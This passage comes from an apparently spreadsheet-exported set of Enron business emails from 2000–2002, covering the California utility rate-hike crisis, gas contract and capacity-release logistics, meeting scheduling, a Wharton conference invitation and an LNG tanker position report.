themselves some time by erring just slightly to the high side of a rate _x000D_
increase, which could fend off the ratings agencies and provide additional _x000D_
opportunity over the next 90 days or so to scrutinize the utilities claims _x000D_
and come up with comprehensive solutions to the bigger problems._x000D_
_x000D_
Well, you got my two cents.  Sorry about that.  _x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
******************************************************************************_x000D_
********************_x000D_
_x000D_
Late afternoon 1/3/01 news:_x000D_
_x000D_
_x000D_
USA: Calif utility ratings may fall too far on 7-15 pct hike._x000D_
By Jonathan Stempel_x000D_
_x000D_
01/03/2001 _x000D_
Reuters English News Service _x000D_
(C) Reuters Limited 2001. _x000D_
_x000D_
NEW YORK, Jan 3 (Reuters) - Bankruptcy may loom and the credit ratings of the _x000D_
two largest California electric utilities will likely fall too far if that _x000D_
state's Public Utilities Commission awards them an interim rate hike of 7 to _x000D_
15 percent, analysts said Wednesday._x000D_
_x000D_
In a draft decision on Wednesday, the CPUC proposed an immediate hike of 9 _x000D_
percent for residential customers of Pacific Gas &amp; Electric Co. and Southern _x000D_
California Edison, and hikes of seven to 15 percent for various business _x000D_
customers._x000D_
_x000D_
The CPUC commission is expected to issue a final decision on Thursday._x000D_
_x000D_
"It forces the utilities and their creditors to be limbo dancers, and skilled _x000D_
limbo dancers at that," said Shawn Burke, head of U.S. investment-grade _x000D_
research at Barclays Capital._x000D_
_x000D_
PG&amp;E and SCE had requested respective rate increases of 26 percent and 30 _x000D_
percent, a hike that would help them avoid imminent bankruptcy._x000D_
_x000D_
The utilities have also asked the regulators to remove a freeze on retail _x000D_
rates imposed under California's 1996 law that deregulated the state's _x000D_
electricity market._x000D_
_x000D_
On a day when most stocks roared ahead after the Federal Reserve announced _x000D_
surprise interest rate cuts, investors beat down the stocks of Pacific G&amp;E's _x000D_
parent, San Francisco-based PG&amp;E Corp. , and SoCal Edison's parent, Edison _x000D_
International ._x000D_
_x000D_
PG&amp;E shares closed Wednesday on the New York Stock Exchange at $17, down _x000D_
$2-9/16, or 13.1 percent, while Edison International shares closed at _x000D_
$12-1/4, down $2-3/4, or 18.3 percent, on the Big Board._x000D_
_x000D_
Bond quotations were not immediately available for the utilities' bonds, _x000D_
which in recent weeks have traded like junk._x000D_
_x000D_
Pacific G&amp;E and SoCal Edison were banking on a big rate hike to allow them to _x000D_
pass on some of their soaring wholesale power costs to consumers._x000D_
_x000D_
The utilities, which operate under a rate freeze, have accumulated more than _x000D_
$8 billion in unrecovered costs since wholesale power prices started _x000D_
skyrocketing last summer amid a worsening electricity shortage in the state. _x000D_
They claim they are running out of money due to the price freeze, and have _x000D_
billions of dollars of bills coming due in the next six weeks._x000D_
_x000D_
Central to their concerns is whether credit rating agencies Moody's Investors _x000D_
Service and Standard &amp; Poor's will cut their medium investment grades to junk _x000D_
status._x000D_
_x000D_
"No one knows for sure, but if we consider the average rate hike is only _x000D_
about 10 percent, it will be difficult for the companies to maintain _x000D_
investment-grade ratings," said Dorothea Matthews, a fixed-income electric _x000D_
utilities analyst for Deutsche Banc Alex. Brown._x000D_
_x000D_
The utilities have already been unable to tap short-term capital markets _x000D_
because of their precarious financial state._x000D_
_x000D_
Downgrades to junk, which the agencies have already threatened, would cement _x000D_
the door shut to these markets, and cause the utilities to default on some of _x000D_
their loans._x000D_
_x000D_
Late Wednesday, PG&amp;E Chief Executive Gordon Smith said the commission's _x000D_
proposed hikes could jeopardize his utility's future loans._x000D_
_x000D_
Even a downgrade to the lowest investment grades - "Baa3" for long-term debt _x000D_
and "Prime-3" for short-term debt from Moody's, and "BBB-minus" and "A3" from _x000D_
S&amp;P - would make the going very difficult for the utilities. The reason: _x000D_
short-term debt markets are often closed to companies with those ratings._x000D_
_x000D_
"Unless this process allows the rating agencies to keep 'A2/P2' ratings on _x000D_
the short-term debt of both companies, then this process has largely been a _x000D_
waste of everyone's time," said Burke._x000D_
_x000D_
Still, he said, "there is a reasonable chance, despite today's weak _x000D_
recommendation, that the situation can be salvaged with mid-'triple-B' _x000D_
ratings, which would allow a lifeline to conventional sources of liquidity."_x000D_
_x000D_
Moody's and S&amp;P were not available for comment._x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved_x000D_
_x000D_
_x000D_
_x000D_
	Kari Dohn &lt;Kari.Dohn@GOV.CA.GOV&gt;_x000D_
	01/03/2001 06:30 PM_x000D_
		 _x000D_
		 To: "'Jeff.Dasovich@enron.com'" &lt;Jeff.Dasovich@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: RE: Additional Materials_x000D_
_x000D_
thank you so much.  so the news aint great for utilities?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Jeff.Dasovich@enron.com [mailto:Jeff.Dasovich@enron.com]_x000D_
Sent: Wednesday, January 03, 2001 2:14 PM_x000D_
To: Kari Dohn_x000D_
Subject: Additional Materials_x000D_
_x000D_
_x000D_
_x000D_
Greetings Kari:_x000D_
_x000D_
Forgive the delay.  Much going on today, PUC draft decision in particular._x000D_
The draft does not look promising for the utilities' financial position._x000D_
_x000D_
Attached are our comments on the Governor's Proposals and some more detail_x000D_
on the demand-reduction proposal.  We continue to work on the Nord Pool_x000D_
research for you and will turn that around as quickly as we can._x000D_
_x000D_
Again, don't hesitate to contact me if there's anything else I can help_x000D_
with, or if there's anything else that you need. (415.782.7822)_x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
(See attached file: Comments on Governor's Proposals 010301 .doc)(See_x000D_
attached file: Demand buy-down proposal.doc)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 07:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hermannpk@aol.com'})</t>
  </si>
  <si>
    <t>Re: Sunday lesson</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks_x000D_
_x000D_
Susan Pereira_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hermannpk@aol.com on 02/07/2001 03:56:25 PM_x000D_
To: Susan.W.Pereira@enron.com_x000D_
cc:  _x000D_
Subject: Re: Sunday lesson_x000D_
_x000D_
_x000D_
I have Kali in for 3PM Sunday._x000D_
_x000D_
Helen Peters_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 03:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENA/Las Vegas Interconnection Agreement Conference Call</t>
  </si>
  <si>
    <t xml:space="preserve">At Mary Hain's request, the following are times Andrea Chambers and I would _x000D_
be available for the call:_x000D_
_x000D_
- today 3/15: very problematic; possibly after 3:00 Denver time but will have _x000D_
to confirm;_x000D_
_x000D_
- tomorrow 3/16: pretty open until 4:00 Denver time_x000D_
_x000D_
- Monday 3/19:  OK except between 12 and 3 Denver time_x000D_
_x000D_
Let me know what works for you; I apologize for being very tied up today.  JM_x000D_
_x000D_
John Maas_x000D_
LeBoeuf, Lamb, Greene &amp; MacRae_x000D_
303-291-2614_x000D_
jmaas@llgm.com_x000D_
_x000D_
The information transmitted is intended only for the person or entity to _x000D_
which it is addressed and may contain confidential and/or privileged_x000D_
material.  Any review, retransmission, dissemination or other use of, or _x000D_
taking of any action in reliance upon, this information by persons or_x000D_
entities other than the intended recipient is prohibited.   If you received _x000D_
this in error, please contact the sender and delete the material from any_x000D_
computer._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 08:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Renegade Indian Guide Roster and assignments</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 09/11/2000 03:05 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Stehr, Paul M" &lt;Paul.Stehr@standardregister.com&gt; on 09/07/2000 08:25:12 AM_x000D_
To: "Benninger, David" &lt;david_m_benninger@reliantenergy.com&gt;, "Butch Butcher _x000D_
(E-mail)" &lt;butch@watsonmoving.com&gt;, "Delozier, S. Don" _x000D_
&lt;Delozier.S-Don@usa.conoco.com&gt;, "Ed Fallick (E-mail)" &lt;efalldr@aol.com&gt;, _x000D_
Jimmy Daggett &lt;Jimmy.Daggett@ST-Systems.com&gt;, "Joe Hayes (E-mail)" _x000D_
&lt;joe_a_hays@oxy.com&gt;, John Haveman &lt;jhaveman@danielind.com&gt;, "Johnny Byrd _x000D_
(E-mail)" &lt;jbyrd@byrdinterior.com&gt;, "Lew TenHave (E-mail)" _x000D_
&lt;letenhave@freewwweb.com&gt;, "Mark Pate (E-mail)" &lt;markjpate@hotmail.com&gt;, _x000D_
"Mark Suchman (E-mail)" &lt;marks@stes.com&gt;, "Rod Wiggins (E-mail)" _x000D_
&lt;rkgbh@aol.com&gt;, "Ron Hancock (E-mail)" &lt;rhancock@nmhn-law.com&gt;, "Scott Neal _x000D_
(E-mail)" &lt;sneal@enron.com&gt;, "Troy Utz (E-mail)" &lt;troy_utz@ml.com&gt;_x000D_
cc:  _x000D_
Subject: Renegade Indian Guide Roster and assignments_x000D_
_x000D_
_x000D_
Yat-teh-hey,_x000D_
_x000D_
The attached two files are the monthly activity list and an updated tribe_x000D_
roster._x000D_
_x000D_
 &lt;&lt;Indian Guides Activities 2000-2001.doc&gt;&gt;   &lt;&lt;Indian Guides Roster.xls&gt;&gt;_x000D_
_x000D_
These files are in Microsoft Word and Excel.   Let me know if you are not_x000D_
able to open these files._x000D_
_x000D_
_x000D_
Lew Tenhave and Ed Fallick,_x000D_
_x000D_
The two of you are responsible for the September activity. (Stratford High_x000D_
School Football Game)  I am not sure but you may also be the "Co-Chief's"_x000D_
for 2001-2002, I will have to check the pow-wow minutes._x000D_
_x000D_
What-the-heck_x000D_
_x000D_
Paul M. Stehr_x000D_
Regional Sales Mgr. - Southwestern Region/DSG_x000D_
Standard Register_x000D_
Phone: 713-585-3807_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Indian Guides Activities 2000-2001.doc_x000D_
 - Indian Guides Roster.xls_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 08:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.stransky@enron.com'})</t>
  </si>
  <si>
    <t>Re: Cambridge Energy Multi-Client Study</t>
  </si>
  <si>
    <t xml:space="preserve">Joan,_x000D_
_x000D_
Thanks. I would appreciate the full report._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Joan Stransky @ ENRON_x000D_
	04/09/2001 01:50 PM_x000D_
	_x000D_
To: Julie A Gomez/HOU/ECT@ECT, Doug Leach/HOU/ECT@ECT, Susan _x000D_
Miller/ENRON@enronxgate, Kimberly Watson/Enron@EnronXGate, Denis _x000D_
Tu/FGT/Enron@ENRON, David Rosenberg/FGT/Enron@ENRON, Vince J _x000D_
Kaminski/HOU/ECT@ECT, Elizabeth Linnell/NA/Enron@Enron, James D _x000D_
Steffes/NA/Enron@Enron, Steven J Kean/NA/Enron@Enron, Steven _x000D_
Harris/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Cambridge Energy Multi-Client Study_x000D_
_x000D_
_x000D_
Please note the attached document from Margaret Carson:_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 07:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tomczyk@wharton.upenn.edu'})</t>
  </si>
  <si>
    <t>frozenset({'vkamins@enron.com', 'christie_patrick@enron.com'})</t>
  </si>
  <si>
    <t>Invitation-WhartonETEvent-Apr20/PlsRSVP</t>
  </si>
  <si>
    <t>Vice and Christie hello,_x000D_
_x000D_
_x000D_
This is a followup to our previous invitation to attend_x000D_
our next Wharton/ET event.? You can RSVP by replying_x000D_
to this email - or - if you cannot attent, you're always_x000D_
welcome to designate someone else.? There is no_x000D_
limit on the number of attendees from your company._x000D_
_x000D_
_x000D_
___Yes I plan to attend_x000D_
___No, I cannot attend_x000D_
___Someone else from our organization will attend (name: ____)_x000D_
_x000D_
_x000D_
Best regards,_x000D_
Michael Tomczyk_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MANAGING STRATEGIC PARTNERSHIPS?_x000D_
FRIDAY APRIL 20, 2001 -- 8:30am to 400pm_x000D_
Location - Room 1206 Steinberg-Dietrich Hall - WHARTON SCHOOL - Philadelphia_x000D_
_x000D_
_x000D_
We have designed this conference as an insight-building event,_x000D_
to present current industry experience from best practice firms,_x000D_
as well as our most recent research findings on best practices_x000D_
and strategies for developing and managing alliances,_x000D_
mergers and high tech acquisitions.? We will include research in progress_x000D_
from our ongoing long term studies on Alliances and Acquisitions._x000D_
This is part of our research activity and there is no conference fee._x000D_
_x000D_
_x000D_
The Emerging Technologies Management Research Program/Mack Center_x000D_
is working to identify and develop best practices, competitive strategies and_x000D_
management approaches for industry decision makers in industries that are _x000D_
being_x000D_
created or transformed by emerging technologies._x000D_
_x000D_
_x000D_
Our industry partners include: Bank of Montreal, Charles Schwab,_x000D_
DuPont, Enron, General Motors, GlaxoSmithkline, Hewlett-Packard,_x000D_
IBM, Independence/Blue Cross, McKinsey, NSA, Procter &amp; Gamble,_x000D_
Sprint, 3M and Xerox._x000D_
_x000D_
_x000D_
The agenda is included below and more information can also be found on our_x000D_
website: ?http://emertech.wharton.upenn.edu ._x000D_
_x000D_
_x000D_
Please call or email if you have any questions or comments about any aspect_x000D_
of this event? - 215-573-7722._x000D_
_x000D_
_x000D_
AGENDA_x000D_
_x000D_
_x000D_
MANAGING STRATEGIC PARTNERSHIPS_x000D_
An insight-building conference including new Wharton research on_x000D_
best practices and successful strategies for achieving corporate_x000D_
growth through alliances, mergers and acquisitions._x000D_
_x000D_
_x000D_
Friday, April 20, 2001 - 8:30 to 4:30_x000D_
1206 Steinberg-Dietrich Hall, Wharton School_x000D_
_x000D_
_x000D_
Presented for our industry partners and guests by the_x000D_
Emerging Technologies Management Research Program,_x000D_
Mack Center on Managing Technological Innovation_x000D_
_x000D_
_x000D_
Faculty Research Presentations by: ?_x000D_
Harbir Singh, Paul Schoemaker,_x000D_
Lori Rosenkopf, Phanish Puranam and Prashant Kale_x000D_
_x000D_
_x000D_
Industry Best Practice Presentations by:_x000D_
Sun Microsystems, Cybersource, Broadview and Pfizer._x000D_
_x000D_
_x000D_
AGENDA &amp; CONFERENCE TOPICS_x000D_
_x000D_
_x000D_
8:00-8:30 ?- ?Continental Breakfast and Informal Networking_x000D_
_x000D_
_x000D_
8:30-8:45_x000D_
Introduction: Strategic Partnering for Growth and Innovation_x000D_
_x000D_
_x000D_
8:45-10:00_x000D_
Managing Strategic Networking_x000D_
_x000D_
_x000D_
10:00-10:30 - Break_x000D_
_x000D_
_x000D_
10:30-11:30_x000D_
Building Partnering Skills and Capabilities_x000D_
_x000D_
_x000D_
11:30 - 12:00_x000D_
Success and Failure Factors in Strategic Partnering_x000D_
_x000D_
_x000D_
12:00-1:30_x000D_
Working Lunch - Strategies_x000D_
_x000D_
_x000D_
1:30-2:30_x000D_
Small Group Reports_x000D_
_x000D_
_x000D_
2:30-2:45 - Break_x000D_
_x000D_
_x000D_
2:45-3:40_x000D_
Managing High Technology Acquisitions_x000D_
_x000D_
_x000D_
3:40 - 4:00_x000D_
Summary of Key Insights and Future Research Goals_x000D_
_x000D_
_x000D_
4:00 - Adjourn_x000D_
___________________________________________x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Directions:? Take a taxi to the corner of 37th and Walnut.? At that _x000D_
intersection, turn left and take the broad walkway onto campus.? Turn LEFT at _x000D_
the first intersection (you will see a lifesize statue of Ben Franklin _x000D_
sitting on a park bench).? This is LOCUST WALK.? The Steinberg-Dietrich Hall _x000D_
is the large brick building immediately behind "Ben" - if you turn left and _x000D_
proceed down the walk you will come to the large entrance with cantilevered _x000D_
steps on the RIGHT side of the walk.? The room iw Room 1206 and there is an _x000D_
information desk straight back from the entrance, to guide you to the room._x000D_
_x000D_
_x000D_
If you are staying at the INN AT PENN, which is directly across the street _x000D_
from campus on Walnut (between 36th and 37th) - take the WALNUT STREET EXIT _x000D_
from the hotel (where the restaurant is), turn RIGHT from the entrance and _x000D_
walk to 37th street, cross the street and continue onto campus following the _x000D_
directions (above paragraph)._x000D_
_x000D_
_x000D_
Wharton is 30-40 minutes from the airport, 10-15 minutes from the 30th St. _x000D_
Train Station and about 15-20 minutes from most hotels in Center City._x000D_
-- _x000D_
Michael S. Tomczyk_x000D_
Managing Director_x000D_
Emerging Technologies Management Research Program_x000D_
1400 SH-DH/6371_x000D_
The Wharton School_x000D_
Philadelphia, PA 19104-6371_x000D_
_x000D_
Tel 215-573-7722_x000D_
Fax 215-573-2129_x000D_
website:? http://emertech.wharton.upenn.edu</t>
  </si>
  <si>
    <t>Thu, 17 May 2001 01:06:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>POSREP 17 MAY</t>
  </si>
  <si>
    <t>POSREP HOEGH GALLEON, DATE:	17-May	12:00	8:00	(UTC)_x000D_
A) Position at noon:	N	13 10	E	47 04_x000D_
B) Dist. From last noon:	440	nm_x000D_
C) Dist. To go to next port:	1424	nm_x000D_
D) ETA next port:	SUEZ	20 20:00	LT_x000D_
E) 1: Average sea/wind	Sea:	SSW 3	Wind:	SSW 2_x000D_
    2: Average speed	18.33	kn	RPM:	94.85_x000D_
    3: BOG consumed	148.231	m3_x000D_
    4: BOG Total	148.231	m3_x000D_
    5: F.O Consumed	62	m3_x000D_
    6: G.O. Consumed	0	m3_x000D_
    7: Average vapor press		Average liq. Temp:_x000D_
Tk1:	0.099	bar	-159.2	?C_x000D_
Tk2:	0.097	bar	-159.3	?C_x000D_
Tk3:	0.097	bar	-159.4	?C_x000D_
Tk4:	0.096	bar	-159.2	?C_x000D_
Tk5:	0.098	bar	-159.1	?C_x000D_
_x000D_
_x000D_
Brgds Knut Bentzr?d_x000D_
Master LNG/C "Hoegh Galleon"_x000D_
_x000D_
E-mail: master.gall@hoegh.no_x000D_
Teleph: Inmarsat tel.no.+873 330853910_x000D_
Fax   : Inmarsat fax no.+873 330853913_x000D_
Telex : Inmarsat B telex no.+583 330853915_x000D_
Telex : Inmarsat C telex no.+583 430853910 (24hrs.watch)</t>
  </si>
  <si>
    <t>Wed, 12 Dec 2001 08:45:45 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kimberly.watson@enron.com', 'lorraine.lindberg@enron.com'})</t>
  </si>
  <si>
    <t>RE: Transwestern Off-system Transportation Contract T39817</t>
  </si>
  <si>
    <t>Lorraine,_x000D_
_x000D_
	Thanks for forwarding the attached message. The way I read this, PSNM is effectively withdrawing its demand for the collateral as long as we don't use the contract. We should probably send them a letter confirming that this is the case. I would suggest that you just send an e-mail in response stating that what PSNM has proposed is acceptable and that our understanding is that PSNM will not require collateral as long as we don't utilize the contract. Therefore, PSNM's demand for collateral by December 15 is, based on our understanding, withdrawn. Please let me know if you have any questions. Thanks. _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lindberg, Lorraine  _x000D_
Sent:	Wednesday, December 12, 2001 10:39 AM_x000D_
To:	Rapp, Bill; Watson, Kimberly_x000D_
Subject:	FW: Transwestern Off-system Transportation Contract T39817_x000D_
_x000D_
FYI_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McMurray, Lindsey [mailto:AMcMurr@pnm.com] _x000D_
Sent:	Wednesday, December 12, 2001 10:06 AM_x000D_
To:	Lindberg, Lorraine_x000D_
Cc:	Arreguin, Janette; Dopson, Karen; McFearin, Dan; Merville, Patricia; Thompson, Chuck  (GSC); Vigil, Anita_x000D_
Subject:	Transwestern Off-system Transportation Contract T39817_x000D_
_x000D_
I talked to my Supervisor and here is what we can do, PNMGS will not accept or confirm any nominations under Off-System Transportation Contract T39817.  This will put the Contract in an "INACTIVE" status instead of total Termination of the Contract._x000D_
Prior to any  future expectation of Off-system Transportation, pursuant to Contract T39817 between PNMGS and TWPC, there will then be an updated and current determination on the Financial Responsibility as set forth under ARTICLE XII. FINANCIAL RESPONSIBILITY.   PNMGS will then decide what, if any, steps will need to be taken prior to such Off-system Transportation._x000D_
_x000D_
_x000D_
A. Lindsey McMurray_x000D_
PNM Gas Services_x000D_
Senior Transportation Contract Rep._x000D_
505-241-2686_x000D_
Cell 505-220-2662_x000D_
Fax 505-241-2339</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 07:39:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'teb.lokey@enron.com', 'steven.harris@enron.com'})</t>
  </si>
  <si>
    <t>FW: P.A. Agave I/c</t>
  </si>
  <si>
    <t xml:space="preserve">Steve and Teb(for Steve Veach),_x000D_
_x000D_
_x000D_
Please review the attached work order for the tap and side valve for the new Agave interconnect.  Please forward an email message to Robert Geheb giving him your approval on this work order so that he may begin working with the appropriate people to get the materials ordered.  We are under a very tight time frame and we don't want to loose anytime.  The "paper" will follow to you shortly for signiture, but this email approval will keep the process moving.  Also, as soon as we work out the remaining details with Agave on the remaining costs, we will revise the work order to include the items that Agave will be constructing for us as well as provide the economics for the interconnect.  This, too, will be routed to you for your approval._x000D_
_x000D_
Please let me know if you have any questions._x000D_
_x000D_
Thanks, Kim. (X33098)_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chanley, Earl  _x000D_
Sent:	Wednesday, September 26, 2001 11:22 AM_x000D_
To:	Geheb, Robert_x000D_
Cc:	Watson, Kimberly; Abdmoulaie, Mansoor_x000D_
Subject:	P.A. Agave I/c_x000D_
_x000D_
Robert_x000D_
_x000D_
Attached is a marketing project for an I/C for TW. Please route for approvals. The Marketing rep is Kim Watson._x000D_
_x000D_
Thanks_x000D_
Earl_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 26 Feb 2002 11:17:52 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Ivy.  Your end date is correct._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Ivy Kao" &lt;ivy_kao@iroquois.com&gt;@ENRON  _x000D_
Sent:	Tuesday, February 26, 2002 1:03 PM_x000D_
To:	Germany, Chris_x000D_
Cc:	robin_zaleski@iroquois.com_x000D_
Subject:	Re: Capacity Release_x000D_
_x000D_
Chris:_x000D_
_x000D_
The offer is now on our Iroquois OnLine system and has an offer number of 50153.  The only thing I've added is Liz Dennehy's email address which I have as ldenehy@keyspanenergy.com._x000D_
_x000D_
Also the offer term end date is 4/1/2002 at 09:00.  If I left it at your 3/31/2002 09:00 then they wouldn't be able to nominate it on the very last day of the month.  Please let me know if that is ok.  Thanks._x000D_
_x000D_
Ivy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Germany, Chris" wrote:_x000D_
_x000D_
&gt; Ivy_x000D_
&gt;_x000D_
&gt; I have been having problems trying to log into Iroquois EBB to release capacity to Boston Gas.  Please release the following capacity to Boston Gas for March 2002, pre-arranged, subject to bid.  It should be the same as offer 50136 for February 2002._x000D_
&gt;_x000D_
&gt; Releasing shipper contact               Chris Germany_x000D_
&gt; Phone number                            713-853-4743_x000D_
&gt; Fax number                              713-646-3037_x000D_
&gt; email address                           chris.germany@enron.com_x000D_
&gt; Releasing contract number:              6999_x000D_
&gt; Begin Term                              3/1/2002_x000D_
&gt; End Term                                3/31/2002_x000D_
&gt; MDQ                                     35,465_x000D_
&gt; Minimum bid volume                      35,465_x000D_
&gt; Receipt Point                           Waddington_x000D_
&gt; Delivery        Point                           Tenn/Wright_x000D_
&gt; Bid period start                                2/26/02 1:00 PM_x000D_
&gt; Bid period end                          2/26/02 2:00 PM_x000D_
&gt; Prearranged bid rate                    100% of max rate_x000D_
&gt; Prearranged bidder                      Boston Gas_x000D_
&gt; Prearranged bidder contact              Liz Danehy_x000D_
&gt; Phone number                            617-723-5512_x000D_
&gt; Fax number                              617-323-5372_x000D_
&gt; email address_x000D_
&gt;_x000D_
&gt; Let me know if I missed something._x000D_
&gt;_x000D_
&gt; Thanks_x000D_
&gt; Chris Germany_x000D_
&gt;_x000D_
&gt; **********************************************************************_x000D_
&gt; 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_x000D_
&gt; **********************************************************************_x000D_
_x000D_
 - ivy_kao.vcf &lt;&lt; File: ivy_kao.vcf &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 13:41:58 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lindsay.renaud@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'k..allen@enron.com', 'kevin.ruscitti@enron.com', 'tom.donohoe@enron.com', 's..shively@enron.com', 'm..presto@enron.com', 'martin.cuilla@enron.com', 'keith.holst@enron.com'})</t>
  </si>
  <si>
    <t>New Active X for EOL Website</t>
  </si>
  <si>
    <t xml:space="preserve">In case I did not find each of you personally, please be aware that as in the past with new Active X releases you will each be receiving the new version first. Each of you will have a new version of the website this evening, Friday November 16th. _x000D_
_x000D_
You should not notice any changes, but if you do experience any problems please call me. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Lindsay_x000D_
_x000D_
Lindsay Renaud_x000D_
EnronOnline_x000D_
Desk (713) 345-3703_x000D_
Cell  (713) 628-0048_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 13:50:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'patricia.steele@enron.com'})</t>
  </si>
  <si>
    <t>Ctrc 24690 Continental CMS</t>
  </si>
  <si>
    <t>Perry had asked me whether this contract had ROFR or not because he thinks it should be terminated, but CAS is still reserving capacity for the contract because it has a ROFR flag on it in CBS.  I think that this contract does not have ROFR, but could you confirm this for me?  If my memory is correct, I thought that this agreement was always done just a month or two at a time and that at the end of each term it was negotiated with the price desk (&amp; more recently TK) to roll for another month or so.  If I'm thinking of the right contract, that would mean that it did not have a ROFR (because it was not for a year or longer) and that it terminated 3/31/2001._x000D_
_x000D_
Could you check the contract file for me and look at the amendment history to confirm that the agreement did not have a year or longer term?  If not, then this agreement should not have the ROFR contract on it._x000D_
_x000D_
Let me know.  Thanks!</t>
  </si>
  <si>
    <t>Thu, 28 Dec 2000 09:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lsommaripa@pirnie.com'})</t>
  </si>
  <si>
    <t>Re: PR Database</t>
  </si>
  <si>
    <t>Leo,_x000D_
_x000D_
Well, actually that is how I spell my name as well...but not Enron - one of _x000D_
the drawbacks to working for a large company.  Your analysis of the database _x000D_
structure and its intent is correct.  The extra table enables the use of a _x000D_
many-to-many relationship between regulatory items and facilities.  Joanne _x000D_
and I previously discussed the need to "keep track" of all facilities _x000D_
referenced in a particular order.  This relationship allows users to query _x000D_
facility and review data related to an order.  For instance, if an order _x000D_
required the upgrade of chlorination facilities at several plants, one could _x000D_
develop a query and report that produced the results of all equipment _x000D_
inspections for the related facilities.  This would not be possible (or at _x000D_
least not achieved as easily) without the many to many relationship.  So yes, _x000D_
you are giving up functionality, so I would only consider eliminating the _x000D_
table if it would causing undo problems with the database.  As far as _x000D_
actually modifying the database, there would be some manual labor required _x000D_
for those orders with multiple facilities already assigned.  _x000D_
_x000D_
I have to go, but if you or Joanne need to discuss it over the phone, I'd be _x000D_
happy to with a little notice.  _x000D_
_x000D_
Mat</t>
  </si>
  <si>
    <t>Tue, 4 Apr 2000 10:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Enron in Fortune!</t>
  </si>
  <si>
    <t>Lavo is going to bring it in for me. _x000D_
_x000D_
I bought QQQ today at 93. Traded 102 in afterhours trading on the island._x000D_
_x000D_
Enron is free._x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Thu, 17 Aug 2000 09:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Northern Illinois Gas Company/Nicor Gas Company</t>
  </si>
  <si>
    <t xml:space="preserve">Is this OK with you for yur financial agreement?_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 08/17/2000 04:51 PM -----_x000D_
_x000D_
	Stacey Richardson_x000D_
	08/17/2000 04:49 PM_x000D_
		_x000D_
		 To: Adnan Patel/Corp/Enron@ENRON_x000D_
		 cc: Tana Jones/HOU/ECT@ECT, Stacy E Dickson/HOU/ECT@ECT, Tom _x000D_
Moran/HOU/ECT@ECT, Frank L Davis/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, _x000D_
Mary G Gosnell/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Linda S _x000D_
Bryan/HOU/ECT@ECT, Bridgette Anderson/Corp/Enron@ENRON, Susan _x000D_
Bailey/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Anthony Campos/HOU/ECT@ECT_x000D_
		 Subject: Re: Northern Illinois Gas Company/Nicor Gas Company_x000D_
_x000D_
OK, guys, based on Adnan's information from the counterparty, all contracts _x000D_
under Northern Illinois Gas Company will be changed (via name overlay) to _x000D_
Nicor Gas Company once Adnan has received the proper name change _x000D_
documentation.   Since no changes have been made in GCP to correct the HQ _x000D_
company and trade name relationships, the recent ISDA contract was set up _x000D_
under Nicor Gas Company.  Once these changes are made in GCP, the contract _x000D_
can be changed to the trade name if still needed at that time._x000D_
_x000D_
I apologize for all the confusion and hope this helps all parties concerned._x000D_
_x000D_
Thanks,_x000D_
Stacey_x000D_
_x000D_
_x000D_
_x000D_
Adnan Patel@ENRON on 08/17/2000 04:20:24 PM_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc: Stacy E Dickson/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Frank L _x000D_
Davis/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Mary G Gosnell/HOU/ECT@ECT, _x000D_
Stacey Richardson/HOU/ECT@ECT, Bill D Hare/HOU/ECT@ect, Linda S _x000D_
